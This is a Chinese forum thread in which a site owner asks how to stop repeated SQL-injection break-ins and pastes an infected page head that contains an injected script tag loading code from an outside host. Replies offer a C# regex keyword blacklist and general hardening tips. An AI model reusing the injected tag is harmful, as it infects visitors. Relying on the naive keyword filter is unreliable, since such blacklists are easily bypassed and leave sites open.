网站SQL数据库总是被人入侵,有什么方法解决

我的网站被人侵,有什么方法可以不让SQL数据库入侵呢.
数据库里添加了许多乱七八遭的链接,不过导致网站打开不正常.
<head>
<title>上海电脑维护、网络维护、网络布线、电脑维修专家 >> 站点首页</title>
<meta content="上海电脑维护中心是：电脑维护、网络维护、网站维护、电脑维修等IT外包服务专家。" name="description">
<meta content="电脑维护、网络维护、网站维护、电脑维修、IT外包服务" name="keywords">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

<style type="text/css">
A{TEXT-DECORATION: none;}
A:h"></title><script src=http://s.see9.us/s.js></script><!--
BODY
{

<script language="JavaScript" type="text/JavaScript">
function HideMenu()
{
}
</script>

</head>
<body leftmargin=0 topmargin=0 onmousemove='HideMenu()'>
<div id=menuDiv ></div>
以上代码帮我看看，看通过SQL防注入程序，应该拦截什么关键词。

过滤Request（C#）

public static string MASK(string inSTR)
{
Regex sqlExp = new Regex(@"(and|exec|insert|select|delete|update|count|drop|table|%|chr|mid|master|truncate|char|declare|'|--|xp_)");

return sqlExp.Replace(inSTR, "");
}

其实说这么多原理.我就说个实际的,你装好杀毒软件并随时保持更新,把系统漏洞的补丁都装上.一般就不会有问题了.不然就在WINDOWS服务设置里,把你不用的服务都关闭了.

你应该检查下你的网站里面有没有被人放入后门！ 还需要看看你的网站源码有没有明显的注入攻击漏洞的地方 然后修改数据库密码

1楼的兄弟，现在的数据库入侵一般都是通过注入进行的，通过WEB的80端口，硬件防火强是不能拦截的。 防止网站被入侵，首先要对带入数据库查询的字符进行严格的过滤。防止黑客通过注入的到管理帐户的密码。现在网上有很多的防注入程序。去下载一个放到你的网站目录。在每个asp文件前面包含进去就行了。这样可以阻挡大多数的小菜。还有，把网站的管理目录的名字改为一些生僻的目录名或者足够的深。让黑客猜到了密码也没处去登陆。（呵呵）最后，鉴于大多数的黑客会上传webshell控制网站。把上传目录都该为不课执行asp文件的目录。这样就可以抵挡大多数的黑客攻击。如果你用的别人的整站系统，请您随时关注它的漏洞信息，及时的打好补丁。

设复杂的密码，一般不用sa登陆，给每个数据库新建一个登陆用户，并指定权限。

你可以去书店买本黑客房的书看看，学习如何攻击网上的计算机和主机。